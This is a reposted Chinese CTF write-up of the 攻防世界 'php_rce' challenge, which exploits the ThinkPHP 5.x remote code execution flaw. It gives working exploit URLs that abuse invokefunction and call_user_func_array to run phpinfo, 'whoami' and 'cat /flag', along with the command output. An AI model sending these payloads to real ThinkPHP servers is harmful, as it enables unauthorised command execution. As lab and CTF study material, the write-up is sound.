CTF-攻防世界-web-php_rce(ThinkPHP5.x < 5.1.31, <= 5.0.23)

本文转载自查看原文 2020-09-23 13:32 556 漏洞复现类/ ctf

ThinkPHP 命令执行漏洞5.x < 5.1.31, <= 5.0.23

这是一个远程代码执行漏洞，先学习vulhub复现这个漏洞的过程：

输入：http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1，可执行phpinfo：

拉到页面底部，看到ThinkPHP的版本是5.0.20：

可以执行phpinfo，那可不可以执行其他命令呢？查了一下网上的payload，如下：

输入：http://your-ip:8080/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

返回：www-data www-data

http://220.249.52.133:49560/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag 得到答案

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 CTF-攻防世界-web-php_rce(ThinkPHP远程代码执行) 攻防世界-web-php_rce（ThinkPHP 5.0命令执行漏洞） CTF-攻防世界-Web_php_include(PHP文件包含) CTF-攻防世界-PHP2(PHP源码) CTF-攻防世界-unserialize3(PHP序列化) CTF-攻防世界-supersqli(sql注入) thinkphp5.x系列 RCE总结攻防世界（四）php_rce CTF-攻防世界-WEB新手练习区 Writeup（12题入门题） ThinkPHP(5.1.x ~ 5.1.31 5.0.x ~ 5.0.23)GetShell漏洞